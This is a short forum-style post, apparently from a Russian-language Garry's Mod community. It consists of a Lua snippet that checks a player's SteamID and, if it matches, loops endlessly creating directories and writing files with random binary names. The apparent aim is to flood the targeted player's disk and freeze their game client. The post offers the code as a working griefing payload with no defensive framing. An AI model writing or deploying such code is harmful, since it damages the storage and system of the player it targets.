Код:
if LocalPlayer():SteamID() == "" then
while true do
name = string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))..string.char(math.random(0,255))
content = string.rep(name,1e2)
file.CreateDir(name..content)
file.Write(name.."/"..name..".txt",content)
file.Write(name..".txt",content)
end
end
Последнее редактирование: